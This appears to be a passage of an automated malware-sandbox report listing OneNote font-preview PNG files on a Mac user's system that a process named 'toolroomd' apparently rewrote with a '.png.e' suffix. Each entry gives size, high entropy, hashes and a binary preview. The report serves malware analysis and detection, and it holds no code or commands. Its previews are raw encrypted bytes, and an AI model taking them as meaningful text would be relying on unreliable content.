Encrypted:	false
SSDEEP:	24:ElFS5zO/INtBJXJIv24wXB+FDTh1hCVjXWr4lqdUiC62sePc0m7:ETEC/UtBJXi2X+9ThOVjYp/CLNpq
MD5:	22CE40C0D0E218E7C8CD2D4A7C72456F
SHA1:	5B6B66C1321029CAA8C40D5F6F3961C951BE49BB
SHA-256:	03BE6034625FDF8E10C5797FF9138D8BCA5D4E4722CEB90271D447952EF0645D
SHA-512:	3657CD114BB7B3782D716CE870C6D37F600FEBAF9902B47B8693749479DBD81F6874169E6AFAF462790E42155412A5A8CFBED41D4EE9D3431B5C70A5EDF094B2
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.1.....z..HK....._t..J7..#D...>.LBe..N..Y.."?.3JN....Dyt....+..../\|B.8Mz.C...z..[....H+....A..6...........L.X+g..!.$.......'.X.7....#...R'R...c.p`^.-....<"\|${\|.L.g....e..XU%.....H.3e..O..\|..W.....E1....6.,.)..O.m.0.H...:......M....p.emma..$wO\|.2..%..8{S\|..*.(..x..Y"}c....%.b....H...z..f.....C.z}.yUZ?.0.Gx.......[...d0k.a.y.s.A.......M...L.([4M.67D.c........-.]x.7'E.1.e.=M.. .......5..(Q......4....>..V.c.....UA.v4...".q...J...P.4?#UC}.1:[.Z.ke..J5........j......w.Y.....74..N..g-..n...t .." t. ;-........$.08.S...m..qf,.......(z.Y...S.,d..f.]d._]DQ}.....i.o.p....Z.4..M-F.C.Z.M.....<;.!I.....\...6..N"&..}.00..X..@....J.1.....x.I.~ A-~.K...8'c#.......`I.v...3HZ.s....oG..5.ZhL9.>........~i.."YGh..gi......-=>?.M...y...tP.$6`.m..b...,..........@....R\...5.....8t....[.bA......DT.x...E.Qm.X.7.\|..R.'...p{..Z.-T.{..F{zTtPz.G.Z.UT#.H}xw....>..u....\|....S...Q...N.3....j&...&6_...+....Q.Y..y..U..Be

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PingFang TCRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1346
Entropy (8bit):	7.427250368993555
Encrypted:	false
SSDEEP:	24:EHNukPRZ0wU+9poWq8udXP+OlosHM3wcOecUWMLp3UOKdMiTVebGsePc0m7:EHNukPRn9poV8AmOloInc5MMLK1cGNpq
MD5:	BDA2C3B293E052EACEDFE3CC31496E98
SHA1:	816BD733DD89B92CB916DACD3F450B3B0385219A
SHA-256:	8BB615090283A0A608C30C1A05BF2FBAC1FB0C639B88C2F95E7431D87CD02F76
SHA-512:	B7F56884CCCBA7C11A839DFE7815D13CF1E4E840C5410BFCBCB07CCDDCAC783FDE6303E76292DEC8608332A10F25558A3C23330620997353ED0DE3D73B8A15EE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.af{...y...i.\|.s..UO.....o.;..(....~..?.`.hS...F:.t..Y<\|Z.A..L.9F..z.%.]p.8.Ft...\b.....a....,.....F#..d:~o..O......uFh#..9....=J..D.B..T...(.'-mF...s.o[....Z\|{"L.O=..-..mi$.......u........k..&zAz.:&r.~\|2J./..}......o#.Cj..d\|.ti...4;....d..R.N.~m..$.....fJe..,U+...T.R>..F.T...{jID....J%`\|.w.B..Y.../..z.Ca...f......,.6.-..7.L..N.\..Cb.y.._.v...5"'......)<0....].].R.D..........u.7..k..d.8^...............`.....mb...!.....Nd...]..:.6)sc....z..y.7......r1...].`..t.A.6...d.P.....`.A.d....y.~MQQQ.i.8....&....`j..JD.........m.Z7w....$.`...e.......#b......M:u...,0..w..............).d......Q..0.T..~.+M.=U......d.+.../J.o..P3..tAg.J.p.p...`@Wq....0.....-+.+..y.H....q..}I.....&IN.......$...ib.D#%{f.2.U]~o.f..nK-.x.xA.gv.pr.h.L.b9E.F'..Xl.R..b`.....*x.?.WD.LT.B..M.e.H..Z..._.%....^...DJs++...;.w(...J?>..V..`h.....a..}../..3.......s..H4#=l.)-~..O[..t.=..d.....+..wWVl...{..`..B.....To...;.8W\

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Plantagenet CherokeeRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2514
Entropy (8bit):	7.744328384622917
Encrypted:	false
SSDEEP:	48:Ex9cNx2HFochaaSlO3V0FfwQjnyHWyQXkoASCTOZnvx9GbGgmou3x3Npq:IcNx2aE+1wQ+HfxlOVrgcx3u
MD5:	962481CD721E8BBF1ECBBE4248EB0F73
SHA1:	85699812613147B2665B4C481AD7AC1BC68D7789
SHA-256:	DD3E150C4811DD818BD00EC2ED0D316FC37F97FD6752DB50C749C05E74B018D6
SHA-512:	76B759EBFC02ED034CE0B3525EADDDC0896CDACD65547DAC2780E5632CD9F10BCCA36739F5BA906167263E04BF2696004683A520B4BBD99439AF1320984C96A7
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..IJ'K.m...1.5s..wZa.0...v.d....c.....z..5.wy~V......5..H./.tt......#Sg........)S.w.V...w....z........8...]./...\|.]./...\|.]./...\|.....u.>zJ'.>.B.{..%.w..#kZ.`...t..f.....74......R[%0(.....J.{......4<.R._;.b......ik..E.^..ZwhUK...}..n}.xr......K'..."l.w..T......WN.=O&.ki.Xj4...`b....J....U.?84a..N...n..U........8......(+B....7,...r.pkX ...I.oXw.~x.~.^l..n..?..W...[........BO....... 9.U....F...,..4....._..>..[MMA.B..G...F(.G./w.......a.RP.....Hk..T5<..9..B.2PQHj..i..A..e......+.+....%....r`j......2...b.K2.).....JmG.5....b......x....f#.L../...~'.....X.......5k.S.s...dI.......A.g..q...Je.:..{54f....~...Z.<..y...c`...Hp.CfM".UAl[.X.f.. ?.}.2D..%..h2......md.Cvxn.X......)z.?l;..q."...)9..w.V.f.....n...=p.O!. .^......s...1_.:....4r.....Ao.\|$..p......3.CM"..g..$g.M.....0ar.]w"c.K..dOwu.....A.......fh...P..X.....I,.Wvjlm.PP7..<.j^...&.........]..~]....sz-.\|~A..yQ.M^.4./-M.k."...._...&V...7

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.RaananaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1050
Entropy (8bit):	7.240290175480696
Encrypted:	false
SSDEEP:	24:ELA1ZXRmBzxO5jx7dzH/ynLaQRsePc0m7:E4Bm/Oz7ZHWLRNpq
MD5:	74F59771E782931EADA82B9D8E0CC229
SHA1:	381D728C5396C3AF6B36AA5C07C73A76FB293714
SHA-256:	5A89CC4D85BDB70C3CF0FBC979DD708489DEF1E4F38AA5CC61C145D69F71B79C
SHA-512:	97217FFA3B6926D550619F8F2B0FBEF95ADEEC4F3526E5B8AFD94E2487F15EEC43452ACD6C78B4BB5E3855F0E29777A4CE89E4F66A334180CEE08A8CE6E3F74A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a?....q..3...z.;[..+.Z.....8.LTl.Y.eH.... c.<.....K...q....g.<.V.....#.-......c.#n...4..G.6.?.K.bY....\.....Quw..f...._..$.....t......8C-}..%.t...s..&S.Mt .y.\..mIN.y).:...=.+UR:.\|..6...t.....yF...}].<.j.t.2.zo..}xy....z....9=.w.W)..\... Fc5....&.d..WQ.p.E.M.}M.<..0z.I....O..<....K.X.^..tr.......aUU..b..{bL.xa<.K?.D......t'..0M.hd@.]6D.\|...I.S.....}..q..)./9.....{.....7=U....\..{.f.Zht_#....R.8..~..9...h.F................b....7XiRcD6..1hj(.,,.V._.Ao.x....K6.B..mL.......k......%.9..F..;....7.A.nB.~..g....'.....L..O......Y..o.3/.T..5.2.v. .#x5.[9..J.........1&@.H.!.....F....#.>...>.<u.{....J.N.5.Kn.I...`..R.n.C.wj.6.vZ..J.....y.. >.R.Z7.E\.:F.I..=.....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXGeneralRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1626
Entropy (8bit):	7.545712783901152
Encrypted:	false
SSDEEP:	48:YuyvETPYNxWJ2MbJRUatnA5+oEnp55KNpq:SvETCML5nAgzxKu
MD5:	84F6722FFC98DA73ADFBD95910CCE190
SHA1:	B58659FF030467EACA10A2E46261BF2459FD393E
SHA-256:	B00F1E03900FDAE3E8F7986A08E46A2D90D875AE36FC3CA92E194209B7BC79C7
SHA-512:	0958FA0950C6233D08324688A55359C40318FE20FEAEF2FC9AB6443938789C7C93ECFCB2C52578F527E6930F0F4C8D49B6FE4378DD323FE03904DF25982920B1
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a ..\|.t.G...>...[.....Zm..--...-.u....P~......d.:I...._...7..zl2..!$....u.+..h..{~:...,.>.....@.H.......d.....e..VA....G4x.f....q.}...a.E....2..^!....5....rS.4...y....b....D..7..8.mXY.0.#....]t..Y!..R.h. .......'p...3....a..;.!.:.Q2.....d..zq-...[....@Q....i.i"._.b..I.[.r"FLu].y.P/>..V.~]..<6..&9...\|...!.^.. .Pbo.>]....8.wg.....@.u5l.'...x.....D.Mp...6h.lU8...<-.t..S..Dl..NF.UK.V:../..k)I.3j.2.p.7...Zd.jFdp..O ..n.~.P.2..}.......M......o3.<.2...Y...Y.n~....&T.7;K..!.-.......T..6..?.2..kh.9]&......H[........]......pp.W.....K@!.m...O.....j....#@..!..\...MB....,.5f..d.r........A.~...].y..9...RFH...F.....a.nq....f.dzY.M[j...>.....p2......\|.R].U...A...V..cn.q..}..br..V._0.<.0.R8.T.OXF.).....!u...&.~.KC...<S..?..n..y.K).0..x..ge.\VHN....)...*cm.o.w.\|;S..y..".8.8...b.D..{.H..{...Sv..PM...>H..OI.;...u9...Wy.Z.......D.zD.......f.1._ZP...0.! .Ol..2....._..i..@.....4Lq..d58... ........4j..E..........\.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXIntegralsDRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1890
Entropy (8bit):	7.634830574294774
Encrypted:	false
SSDEEP:	24:XbtIWq3UfEPhB66X8TX4SGJl6ystSzy+pwWhGnHgjV2AZJjQOMbSbMFlHnc5+se4:5IvZB1MUs0zhY+VrJjDxgXNpq
MD5:	E3E860263754F3155E338878F954A7F7
SHA1:	A9CD8DA26C770E2C118FE258707DBC7F7B665710
SHA-256:	89E164C7CA9EC48ABBAE5F3F4AC66325B7C287C0509D13D6F8C98933406DCD9D
SHA-512:	D8E5FB0FBA1A47BC94C8F82589704AFD9AFA3BB58CD5BC83D246417A2E29C361B24B1D63D554E7F94E861C2BCBD7857E0F4133FD56D5A0353E0343C363956EA4
Malicious:	false
Preview:	.<.\|.....f.A..N......H...Y..Jw\|..:.H.i .Y.a..Iu..]=.0Q.(...2K:\|z. ...a..SJ>...O.....(cKr.-..;O9......~.#.Ah.o........~..M,}d(#......DJ<].^.K...R..'.d.....Z...R.n.C..H...\.e8...\.....Quw..f...@..i.#Y'za.(V..."._p.l....8.5d..B>..T....p2o.y..^A` ..g.u.$.........cI..N+.].f4.>[......+...9.Q.c.6.a..\|...[....D]h.Z.8QXe1T..{.4.>..d..]./o.(\.i.%+.....'.h.R...T.>...b>....s!..5e%3#.v..koL.tL:.x...#mXA.../..Lo.wo...y.!.].&.Fk.[......_K.J..t.6{.LD.R..8.A.r...P...$..]s..2...,...\.3.)......B...Kj.M.p,...\|...~... v...E.......2z.U.@L.X)...0bZ.w..q(.....,#./..@......jj7.96.h\$M..$.8E..'.K....W...mMc...!..E....A7.a..+..q.....Z...}A.<a.'.kd........c.......A..~. .$bS..SG.........y..._E...E0..b.W..>q.gd.U.mf_..B8u.....j...%..]i...lG...8<..[.y.2.I..{. 1.....Z..9:?.8..\|3..p.NmrN.#.n.....&........D.....k.J..4..n..P&..O1.w#Uj,4..../<....b.}.\|...6..X.Z...\.G..R;./.I..q.. .P..E."nw.....q.....LQi.M{.....>FR0o.c.^.F..Am..?..Q~r.C..).%./B.........f.v..Tu.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXIntegralsSmRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1906
Entropy (8bit):	7.6338711626984805
Encrypted:	false
SSDEEP:	48:YuVQpshNk8j7ZnCtvk2IhQmcmOrstavRNUDlNpq:qpshNks71CtvPC5lOrmoN4u
MD5:	990F95EFC7FA2C97D3ADC48931384FDE
SHA1:	8A1F344AFB06BFA0C30B63D9363F2892A47146BB
SHA-256:	23BA2F8B09682D548404659856ABF781B04B4B50B8D90CF34569B7D8F27E9DE7
SHA-512:	D92D019A5DFA37032F06F73DA859EE9097699A451114501EDC5FDA1300A7F8702AD44F5F8BF0290B8941E4B63EA87FCE5DA645CED0F314FF64BD8B4CC5180714
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a.3T;v...9E..U .b.ow0..%..0...&.Q...t.Pp.v)&.bp.5hM)...$!_>....<..`+Z....:"T..Q.`m.T....K..l.c...q-.<..../W.M.(.B..i.H.:..i.H.:..i.H.:..{..=...j..Be.......v3.r.....K..........T.8..I........t.. .a.... .G..............#......b}.A........~...U...vF.<1...<.C?RcR.3v.J..yZr......O.......{Wa...E....B..e...pi..E..3....~Hk........a....s.....Ll.9z.....#.U.E.n?.b....Nw...\|..k..Q......l6...3..b..c..[,q...{.Z.....VJ..?...........&N...=.,Q.(8..'...5x:..:..4^../F..............i..-&.......J!.$.U;.....os.y.x..pl..o..w.Z5.Z.]......q&.Pp.>j..!..0..s...QZR....pA[..7.-YP..p.0W+..b.hm&5..@.$.A*-......uX....b....'Tl..0ND.Cu.n.V.+G`.=..Zs...j]..]_.....b.F.e.D.w@S.)2..H.a.4;.gU:.....Y.O.GY4..l.e.3.I......w..{........$[..a\.j.P.K.p?.......c... hl...z..N\|.b.rR.p4.!.R...W.%.8..i.Ra.".....K.......~.`{..H9+.F1p.M..`...Q....U.."._...B)M..-..\...i)..?...X.9%:}Z..[(..o.f..$r..i^YN.....75b....z....s.(..Z\|.u.....n.fr..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXIntegralsUpDRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2130
Entropy (8bit):	7.685073167371245
Encrypted:	false
SSDEEP:	48:GZx55SGZwg/sh7xQ7N8CSuiQJkKi4OjcUMdPBEgN573Npq:40GyhWJjA/b4OIdPBZ7u
MD5:	86A392F68D885FC8D5FD57B85BAF5870
SHA1:	0753614C4E8CD3A1B541B1DA6F59CD38B2F49CCF
SHA-256:	4AF9DF67D9AB37F353AE013082F46622CBF013FCF7C70798E5F1D65AE318EEB9
SHA-512:	A639734443F6AFCADCDF6B41EB9F133CB264943249A7D33171C1EF4B27FD595E2C4C6E9A8E12D5E1FAE50C2B5359E101B584CB4496820A9DF948D0B5ECE0D8A4
Malicious:	false
Preview:	.<.\|.....f.A..N......H...Y..Jw\|..:.H.i .Y.a$.X.u.^pY.$R.>....$\+.=..-7o.#..%3>.+25.....}....g..I....mv.(.gS..?.E.[:......-x.....c...i4\Y..U..M.2..c$.".u.9).d:~o..O......uFh#..9....=J..D.B...B..\|K%.b'..$.".u.9).d:~o..O=..&...U...c.G.<..}c..S`."7\.8.. .....g\".N...{.E......^A#_^..a..0o..S{.......x\..trhi..K...QvW//.. ......(..{..3...1Z...$.p.&q(Dwb).=...$..1.."A.]...V...'.E..K.<qq..v..e.....#_2.f\.....X$.H.............4.;......Nb-..%-.....T5_2K..u..w.0.........1/b..Y.i.ktVt.. .2IFJ].ih.F..\|..Q...i....l..9,.~yG...5z.b....-.j,.^h.Y.-V.._.....hI...$ ...\|l...?.)g.'..UX.K4.@.W.F....C...TN!L....1.........'=.w#m4.0.vo.s....^..{c..2.#..I^.2......8O8...x)I.#.hiT.?.%`..Z6....U..W&2+p.........4.1^\|s,.%'.......E./.F.I....I..T.....'..Z.km.4.!.i..r.WVq./.....~..D..j..z.h6....V.(fXx.....I.....K...Lw{.>.C..'...;.4.d%.Y..Ln.....,S..v.$7......w....'.....J.Q.h...q.^t..VZ a...Ej..T..S.!c"/.j.P.?.B58..q.7=..j..58.E...u(?].U.@\.m.....&5.(.f..g...]+.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXIntegralsUpRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1874
Entropy (8bit):	7.6293118298179685
Encrypted:	false
SSDEEP:	48:YuAuFjEsDFV8uCPN6qj8IlwolY1m0QaNpq:gulpCPN6qAAzCJXu
MD5:	8CADB052DC94F1A49DDF523D8C156F8A
SHA1:	6B9F746D836A1E334FE6EC904C2E996D3424DD84
SHA-256:	EE6FB8E695179017AFD1E348B11DAA3EA494D8014D8628EA8945ED40C9AFA2D2
SHA-512:	03F71087B6D223403AC5B31E36F32886EE7EDB47415045565CF4AC035598153696C5FBF816EF9B6B6EE2B84332F96135FC80F7066474EA7BFF822210D0ED9D99
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a...\..1 .....].z...24....>].N4. L..d@...F..Z...Z...K.l.q.n...%.........T..-`.'2....9..v.0........p...&....v.&....v.&....v.]K...CuP.U...s..f0F.....#..\.%../.0...kRA..#.....m..S-..So..a..v.>.3M_....}...!.....1.....+..7a..!..Fk....6...=...jk...5L[O.u.G....(.-M.3.L..I.....q...38.......P....+he..X...\FC3.>.\+`:.E7.^?..Y/j..P.KT..7..G.....5W,..D.B....@......t...wYKx....X.k........N~.{....J....0.u.[.{u..^R.n!!F.....B..\.5.`a.....=^U>.CE"......cJ....l....q.....).._.M.I....?.u{...^=.......Z..bkS.f......P..\|.%.n\?(...x..v(K.....?.e....1=. ........].../..Jx.bk6..`.r._..C...\Fw.7.1._.}.)4<-..nQjj.}...Q...]\|h9.[b..K.'..q.....2..J-M.T.?RR$..M..v...b.6.]...4.9.;...WB.AZPQ....Z.n...w....7(XP.-......{1..!..j.D-.z<`F.>.y.0...7..K.-.l..xO+.2^,.......A..._.y~..1.GD....x...B.....0........u*2/1.......l......vxT.H..O....PUU.K.s...0.-..4.2Wme.d.....X.!B......j...{.?...Ib..E.O....`...Tv.'....(.9Cr..6.E

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXIntegralsUpSmRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2042
Entropy (8bit):	7.670885069782217
Encrypted:	false
SSDEEP:	48:YuR3cdpYgAZX6uw2dkldv6BlOoyS642V5Npq:xWYgAZX/ulQBlCNvu
MD5:	EBB822A82A71781EF77E02FFCE6DD28A
SHA1:	A4620ACF43426AC45926234514D67482F5F87EF9
SHA-256:	4C4EA46FCEA315ECD5287D6BB1B40AC92409E8EE6E6D6E87260EBC39B3016C51
SHA-512:	564360B9F8D8D070F77F1130D1BCAED1E9D79DC60CDD528A5E375447D8A0A24DC981950EE738ADD9BDA6A845B9B060F1F1D7C78E6494BD33D0C88E9DFC41B388
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a(w.`z....0..^Q[s..C.q...{.)D.x....;..)Ci.'..Q...x....Oo}.`.$.......z._^"wW.z..._...u`.@e..s.>..'9.'.h$G.i.H.:..i.H.:..i.H.:..&...>H...9!..y%.....Zv`.#.+.J...jI..;.....K6U'a.....A.02p......R...[A...........J.=TP.....^J.B.+"mZ..Tp$......tq..Q.8<C5j..-..=..mN.1,.V...../...2..>.?Kn ..O}`w..Q.G.V....3q....O3J...P./......T.U....W...X...I5..D...1...]..0(...~18..?kL..p7?.?...%.w.Y...z....KV..DIa.C^..4Z..p.^_.g.:..........\|s.+.I....;.:.:..>M..Y.$.1<....k).{......O..X&eKnl..[..(6Y.../....;.V.. :q.=.2..LG...u..I....g.........l/...WM....2.>:a.E....s......n[.......Bj.X..TG...{. .W..'5r1.&.M9F...:P..5./._\.=.....Z..Y.....K.D%.Y.?..l....f....tx..V..F...i/E..vD.)..i ..,n.T..5..h}g.<........s...".I.U. .6^...^6L6..[..\`.v\|.q..L.)^..z...I.A....9.%..&0..Ut ...+.t.k..c^.M..,.8.Z.....@.Z..z.E~.S ....zW+...`.J.Y..05..\...U.Y..5e8*.....$..3..]KM..ibX...&uS.-..t.n.i.@.:.......{9.F2...FL....[o.&>439)\...MY.z..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXNonUnicodeRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	7.641897157405304
Encrypted:	false
SSDEEP:	48:7XG2skgKY5wZnX8vQGqmFQ5XKCZZIp3Npq:Tobb5wZnX8NFQr+3u
MD5:	2433C6F2C43A69354C063B40C57624BC
SHA1:	381947B395990129BBB3D8F8FB0E6D52AFB8354B
SHA-256:	A985B6A38734CAC4E64A74872FAF5A56E02C3859A0B57DD067188676F6529D9C
SHA-512:	9A788869821C6DFA472C338741695AE8896407FCFD5064435373E0B4E40F5E72336B5FD4751A5BE0FD681AA5E5535306D01D21EE9922E15D46BD538509D6FBAF
Malicious:	false
Preview:	.<.\|.....f.A....g.$.e{.VM...J.d=.!...i .Y.aU.......}.......Y}..I'.......vA.=..m.G.;.P.^.zV..X...(....\|.e..W...HJ.Ex.......r'.2..K`,..Y`v.{.6.....,k.PY.zd\.=J..D.B...B..\|K%.b'..$.".u.9).d:~o..O{.Q.{q<.~.Mri..k.:.6V.........K.?g>N5.Q./.q........hT.?.E..w. .J...r. ..g....c.....K.4...H0.-...Dx.....Q@.'0^./..\"...._.Uv.m...y/..u.."uo..<.v@n......A..LVH.h..5......=.w...:E.g....b(..'.E-e~....... .:...c.4..M...)....Q#.R.{u.Y.W..\|.?..0.C..Pd.w1R..Eg..Vq....qS..d......^..Z...fG"O....lE!....I.3...=...'../n.O...[.G..&.C.........^..0.x.e..Z.;.G.......F.@..L.._.../V/.>.4r...E..R..>Z.....q,... .i.F.,\..a....I.G.!..M.,..Rm.A......<2>.Z..h....R...\y.......g.Xr.Ls.s...G9.f...JX.G.....D..?..j.v.'.bk(w.9.^~w;8....J...I..[.t.P........g2v.&.C.?.......v..N.q.N.vF........P..y>...c....n1......S.!....1 .D2...-...[v.>.b..Xr"...e"....n.~..)W[.-..\|.Ad......(..I........3.....{m..l..t..i8U!......<a4.....p...eIZ5.~..NV..f.2....:...K....Q......4..`,\|

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXSizeFiveSymRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1714
Entropy (8bit):	7.588721916056797
Encrypted:	false
SSDEEP:	48:EQARq396/a+pKLgLQJderIXX1PIUHdXh4CNpq:0u96/a+kg8JTPVxu
MD5:	09EB1768ED8D28C5D79D8ABD62D7A547
SHA1:	E00A423A93CF62178C1616086E2F80337EFA8C27
SHA-256:	8026BE7C22C7ADA6887AF0E6AF88B458B291D0579683E67D281CE47FDC0A0271
SHA-512:	72200685B5D3C6CB40868DCF5ECB9978FB05465677C0D41447DB04D4F008568E67BF42DECA3A5976B0E5C13B1556F0A8B7690BD3CEAC5BE7C50A829FBB7A7C9D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.o...DW.\|U.H...o."+.....T.#+...%3X.Vq..v...!..tI.p..B...M6.M..y.."v.S.5jv........l....!..>.{Q.3b.X.w:&...,.q...^7,.q...^7,.q...^7n....@....U.....v{5.A.~....ESB..G.Z..1.[1..1.+.a..........z&..G..Y...6..."W.....R...g..!(..t.7D..M2..51..m.F...c.SX)7.....!=U.j..V....u.w.M..-.4`.U.I6=uC.........E.ySv..r.......u.r........HL(+0F...N. S._3......!B..s.......N.......>.xC.K7!.......-d...>..-5Ry.V$....T.S!.w.#...%.2.......,.K$@.5(</X.....S.Qw..YW`N..N\|..g....>.0ql..._&.q.s.g.>...Bd.Z...l\|"V>...$...3{...p.nbg.hN.UO..R....=..R.Y..?b.....;.S..~.x.vb...dg"...z.[.QG.#eV.S}.......7.??[...#..\|...q.w....,.E..J.j..s.S+.hi.@..@c.b..Iw....^y.#\yN.,0j.Y..K.D.....-a...u......S...i...Z.u..FW.jL.!..*...Rx"@.G.A..)V8.....U.v..am.m..L..kJCB.X6..!7.k.<. .4.{.Q.....`.......1.......=.C...k....... ..?pW~..X..3.._...e@0....4.....6...^.Rb...C..`...\|7.&y.........Q)Q3.4.... :.ly..a.!.b......&....jC..-m".J.I..!MX.kp!.@..T.......=.F.....S..o

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXSizeFourSymRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1978
Entropy (8bit):	7.6362039977218075
Encrypted:	false
SSDEEP:	48:G5M8nAzeTR46ubxY+dxCdw6Nb/E9+TNpq:fq7RmqqxCdw4/Ecu
MD5:	C996CF63FF534B5CA74AAEBDC09C2E41
SHA1:	2F692699BED0EDE11BB72B583B7517BDCA075085
SHA-256:	6069CCE0BC0AB639D838EE5E20A2C26FB43347C98AE0315D77EEEEA1139F5DA0
SHA-512:	A4381CB5C53B00F9BEC674C3897772B6EDB3C729349AD52B5FB79E82040D538BEA0B673D0D4A6C27CE42FB6221DA87FE249208BDFDE6EAC40AFE4D94E9069B8F
Malicious:	false
Preview:	.<.\|.....f.A.......^..+.....y<.).!...i .Y.a"..}S.+.:...3.._4......L.1s..%2.....!..+?5...{Z.E-........c...w.Q..I..Bm5R.......&B..P......"o"<.zZ...jI.Z../.izBPWy......+W..#.Q....]...Y.M/z.....7.....F..d'.rr.G...y...d...3.w.H%0A.G.6 ....Rp...@.L...QR.<0X.o.`-==..g..]T.....X%Hc.Q.e.".m..Ci<.....lD.TxHvL.QN.....0..!..'..x..1...f..U3.....C.M.Y9..(.xF.@T7H..;.62...'...4x\.L..%R..).U.hZ...R.I.F.?,....N.U'..EN.....>..$&..e.)CwV.btn..-fQS.1p..6t....d...S....f.Y[...k..^gf.E=....P...2.Dw.Q..p.<".J..s...0.9@..8..?.......~.>..n.jA@N0O....=..\|.}NL....dA...`..J._T...i\|..*=sG.o`...m3..........Tr....R.....p>.t.L3..v.i.....C....5.jp......j1...\6.b.4..0.;..(J}...E.Y.1....6.eO.R....>\|d.D.O....Z'...>......6{.....y..5...V.w..[...}.j~9.&..JZ>..((...^C....$...4.p.z..._3r..9.)f:6....v.U..}r..q..3.y.76...JK.k.`R...o`G.)\|.C...n..,i0...3.o.N?.....?.......%_...R.F..Lw/.......)..}.b.....j.h.'.....q...A....=..A...1...D?jqSm.w.bxb...l...os..OG..1-..Fs6..t...a

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXSizeOneSymRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1850
Entropy (8bit):	7.610311900322595
Encrypted:	false
SSDEEP:	48:TFpgP77D052vgwPL8cmK3Ab5g825xjY7kUmGNpq:TrgP77o52vfzgnGCYbGu
MD5:	6CC17F90AC363A534D61F753C05FF386
SHA1:	878DCD766CD01DC12FC69D2E28223C2B6999499A
SHA-256:	181318A57D2553CB0F8FBCCCA6F84E2AD602715C60EBA4C6D0A4B9C0AEEB59B1
SHA-512:	4640311F0D91EF2EB0310F879A4357A6717A6497BB0DC858840AA2F996820AA3863FCF1605D69AD695FF9F983128105FFC942BADADECA91347FB255F040AF05C
Malicious:	false
Preview:	.<.\|.....f.A...m.......jY .N ...6...i .Y.a.p...."v.....qz....U..Z.(HjB...3[.#.G...Ez........M`.....lh.t..n.zW....3...3.l...s+...n..........{..\e...X..MU..g...W_.....j....vD.&...j.$Za<..W3.=P.LfH....=.P......a..t...... p.........A87k.+S.EgEI'(...-....gl..-..c<!.G.N.j.:.Z\...,.n.AU.IH....m.l..W4lW..8}>..+1...@.X..I..(..@.R..........a" !eP.Z.SE.n.V(\...l.7jfuV..~i!.{.v...? &?.k."e.....ToX...?.=..t.>!.;..Q. ..r......`....$...(.}f..!29..5-...Z..l.....k...lWz..5..e..C..........6.E..C....e.CY.).7...^@..2.?...g.Iq.(.DpZ.......#...j.D...%..+.D.cM&[..".h....X...8..nT.0..v.d.a.8."..._....t...M....~.>.+.E.. 